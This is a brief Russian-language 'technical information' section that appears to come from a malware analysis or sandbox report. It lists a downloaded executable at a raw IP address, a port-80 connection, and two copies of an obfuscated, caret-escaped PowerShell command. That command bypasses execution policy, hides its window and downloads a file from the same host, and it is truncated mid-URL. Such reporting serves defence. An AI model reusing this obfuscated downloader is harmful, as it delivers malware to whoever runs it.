Техническая информация
- http://86.106.131.141/file.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^WeRSh^E^ll.eX^E ^-^E^X^EcUTIONpO^L^icY B^ypAS^S -NOp^roFi^L^E -w^iN^D^O^w^sTYLe^ HiD^d^En^ (^NeW-ObJECT SYst^e^m.NEt^.w^eb^CLiENT).d^O^WN^lOAd^fIle^('http://86.106.131.14...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /C "PO^WeRSh^E^ll.eX^E ^-^E^X^EcUTIONpO^L^icY B^ypAS^S -NOp^roFi^L^E -w^iN^D^O^w^sTYLe^ HiD^d^En^ (^NeW-ObJECT SYst^e^m.NEt^.w^eb^CLiENT).d^O^WN^lOAd^fIle^('http://86.106.131.14...' (со скрытым окном)